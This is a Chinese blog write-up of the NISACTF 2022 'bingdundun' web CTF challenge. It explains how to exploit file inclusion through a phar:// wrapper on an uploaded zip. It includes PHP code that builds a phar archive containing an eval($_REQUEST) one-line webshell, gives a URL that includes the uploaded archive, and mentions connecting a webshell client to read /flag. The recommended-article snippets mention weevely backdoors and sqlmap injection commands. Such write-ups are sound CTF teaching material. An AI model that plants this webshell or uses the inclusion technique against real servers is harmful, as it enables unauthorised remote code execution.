[NISACTF 2022]bingdundun

已于 2022-11-07 15:20:46 修改
阅读量1.6k 收藏 1
点赞数 1
分类专栏: CTF WEB 文章标签: 安全 web安全
于 2022-10-19 13:57:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jhk8698/article/details/127406643
版权
CTF 同时被 2 个专栏收录
2 篇文章 0 订阅
订阅专栏
WEB
2 篇文章 0 订阅
订阅专栏

1. 进入靶场环境,提示upload,应该是一个文件上传与文件包含相关的题目。

2. 点击upload进入文件上传页面。看到url有一个bingdundun的get传参,我们尝试传入其他值尝试一下。

3. 尝试传入index,发现index页面的内容被大量包含进来,并且会自动在后面添加.php

4. 在看文件上传点提示可以传图片或压缩包,因此考虑php伪协议中的phar协议或zip协议。首先写一个phpinfo()脚本,打成zip压缩包并上传,上传成功后利用phar协议包含压缩包中的脚本文件,发现脚本中的php代码被成功包含进来并被当作代码执行了。

获取flag方法

方法一:

利用phar协议读取上传一句话木马,用菜刀链接。

http://1.14.71.254:28884/?bingdundun=phar://23de81832e6ba264115a6192202105f7.zip/reqma

方法二:

构造phar文件,phar文件包含我们想要执行的代码,由于index页面提示,flag就在根目录下,因此如果能直接执行cat /flag 就能出结果了。

构造phar文件方法

  1. 修改php.ini 让phar.readonly 改成off。
  2. 创建一个pharfile.php文件,代码如下,用于生成phar包
<?php
$phar = new Phar("exp.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->addFromString("pharfile.php", '<?php eval($_REQUEST["ps"]);?>');
$phar->stopBuffering();
?>

3. 浏览器访问该文件,在同目录下会生成exp.phar文件。复制一份改成zip格式,然后上传

4. phar://协议将文件包含到当前页面,然后给ps参数传入想要执行的代码值,执行成功。

5. 根据代码提示flag在根目录下,因此构造url得到flag。

堃啊方方土
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[NISACTF 2022]bingdundun~
m0_73612768的博客
01-05 812
用 phar 伪协议进行文件包含;
[NISACTF 2022]bingdundun wp
Leaf_initial的博客
04-14 395
这里大部分人可能会报错,这个错误信息表示在运行phar.php文件时,创建归档文件“exp.phar”的功能被禁用了。由于我一直报错,不能生成文件,改了也没有用,所以找到了第二种解决办法,在php文件的目录下打开cmd,然后命令行输入。(但是不知道为什么我的phpinfo信息不能显示,于是重新上传了一个,变量名改了一下,改成了8,就可以了)可以看到example.phar压缩文件有phar.php文件,里面有一个php代码,内容是一句话木马。连接成功,在根目录的flag文件找到了flag,结束。
CTF实验:web安全命令执行
floyd_art的博客
04-12 1416
命令执行漏洞介绍 当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP的system、exec、shell_exec等,当用户可以控制命令执行函数的参数时,将可以注入恶意系统命令到正常命令,造成命令执行攻击。   调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行,又没有过滤用户的输入的情况下,就会造成命令执行漏洞。 信息探测 ...
第二届陇剑杯2023线上wp
最新发布
5L2g556F5ZWl77yf
09-07 830
题目内容:服务器开放了哪些端口,请按照端口大小顺序提交答案,并以英文逗号隔开(如服务器开放了 80 81 82 83 端口,则答案为 80,81,82,83)半开放扫描端口开放状态。
文件上传相关题目
m0_73952121的博客
10-21 997
简单的文件上传题目
ctf没有cat等程序等情况下读取flag
fjh1997的博客
07-25 793
tcsh 读10行 echo '@ num = 10\nwhile ( $num > 1 )\n set word = "$<"\n echo "$word"\n @ num -= 1\n # rest of code...\nend\n' > /b.sh && source /b.sh < /etc/ctf/flag.txt bash echo $(</etc/ctf/flag.txt)
CTF训练 web安全目录遍历
梁辰兴的博客
10-23 1115
路径遍历攻击(也称目录遍历)旨在访问存储在web根文件夹之外的文件和目录。通过操纵带有 “点-斜线(…)” 序列及其变化的文件或使用绝对文件路径来引用文件的变量,可以访问存储在文件系统上的任意文件及目录,包括应用程序源代码、配置和关键系统文件。需要注意的是,系统操作访问控制(如在微软Windows操作系统上锁定或使用文件)限制了对方的访问权限。这种攻击也称为 “点-斜点线”、“目录遍历”、“目录爬升” 和 “回溯”。
BUUCTF web部分题(二)
yqdid的博客
04-01 1724
[极客大挑战 2019]EasySQL 这是一道sq 注入题 ,有用户登录界面,根据之前做sqli_labs的经验,先尝试admin账户。 嗯…不出意料 然后我在用户名输入框内尝试sq注入:admin’ or 1=1# 页面无回显,但是没有报错 接着 我试了试order by 语句 发现有报错: 仔细一看 ,发现 报错语句有“and password=‘admin’ at line 1”; (直觉 )然后我在密码一栏进行注入 :admin' or 1=1 # 由于是恒真语句,所以成功绕过,直接拿到了
文件包含漏洞详解
m0_55854679的博客
03-12 1万+
文章目录File Inclusion(文件包含)概述漏洞产生原因漏洞特点注小知识文件包含函数includerequireinclude_oncerequire_once文件包含示例pikachu靶场本地文件包含漏洞演示pikachu靶场远程文件包含漏洞演示文件包含漏洞的利用PHP伪协议(文件包含漏洞常用的利用方法)文件包含漏洞的防范措施phpMyadmin靶场练习 File Inclusion(文件包含)概述 文件包含,是一个功能。在各种开发语言都提供了内置的文件包含函数,其可以使开发人员在一个代码文件
对510cms进行渗透测试,找到其的3个flag
Alashan12的博客
04-08 4351
拿到网站 简单观察后发现url区域存在传参 简单测试找到存在注入的界面(此网站多处网址存在注入) 这里我们通过输入一个单引号找到“企业介绍”—>“企业文化”界面存在注入 我们针对此界面(180.76.226.182/about.php?listid=6)使用sqlmap进行爆破 sqlmap -u 180.76.226.182/about.php?listid=6 --current-db 爆当前数据库名 得到数据库名为“510cms” 然后指定该数据库...
命令执行的题目加理解
zbbjya的博客
03-21 712
听课笔记ctfshow的理解29 上图我们会看到有一个preg_match 的函数进行正则表达式的匹配,成功返回1,否则返回0 要有分号不然出不来 phpinfo();使用时后要加分号 分号可以用?>代替 主要作用用法可以看这 https://blog.csdn.net/lituxiu/article/details/89330431?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164783517216781683952973%
CTF/CTF练习平台-flag在index里【php://filter的利用】
热门推荐
Sp4rkW的博客
08-20 4万+
原题内容: http://120.24.86.145:8005/post/ Mark一下这道题,前前后后弄了两个多小时,翻了一下别的博主的wp感觉还是讲的太粗了,这里总结下自己的理解: 首先打开这道题,页面只给你click me? no 点击进去显示test5 第一步,查看源代码,无果 第二步bp,无果 结合到题目,flag在index里,大胆尝试http://12...
ctf GetFlag
cs_xiaoqiang的博客
01-18 5969
今天好不容易将这道题做出来了,来与大家分享分享。题目如下:访问连接:   http://106.75.26.211:2222   先查看源码,没有任何发现。但是在页面上发现一个登陆窗口,跳转到登陆窗口。并且发现验证码是纯数字的md5的取最前面的6位,那么可以自己写一个脚本来跑 有了验证码之后,本来是准备尝试爆破的。可是发现每访问一次验证码都会改变,所以这条路明显行不通。经过多次的尝试之后发现登陆
CTF-web Linux几个关键的文件
iamsongyu的博客
11-27 4736
有些时候,我们遇到可以文件包含读取linux文件的题目,在flag不在根目录,不在标准目录,需要我们去找的时候,有些文件就显得比较有意义。通过读取系统的这些关键文件,我们可以找到蛛丝马迹,从而找到flag的藏身之地,当然,最关键的是,我们需要知道linux有哪些比较关键的,有用的文件。 下图是linux的根目录,分为需要的根文件夹。           bin:全称binary,含义是...
bugku ctf flag在index里
qq_42777804的博客
05-18 587
点击click me? no 注意到 http://123.206.87.240:8005/post/index.php?file=show.php 这是一个典型的文件包含漏洞,(file关键字是提示) 之后查阅用法: php://filter php://filter是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)...
weevely连接后门文件,并寻找网站发布目录下的flag文件
05-30
首先,我需要确认您是否是在进行合法授权的渗透测试工作,因为未经授权的攻击行为是违法的。如果您是在进行授权的渗透测试,请确保您已经获得了授权,并且在合法的测试环境操作。 关于您的问题,weevely是一款基于Python的WebShell工具,可以用于远程管理Web服务器。连接后门文件需要知道后门文件的位置和密码,通常是通过漏洞利用或社会工程学手段获取的。如果您已经成功连接到了后门文件,可以使用Linux命令查找flag文件。可以使用以下命令: ``` find / -name flag ``` 该命令会在根目录下查找名为flag的文件,并返回查找结果。请注意,该命令会在整个文件系统查找,可能需要一些时间才能返回结果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值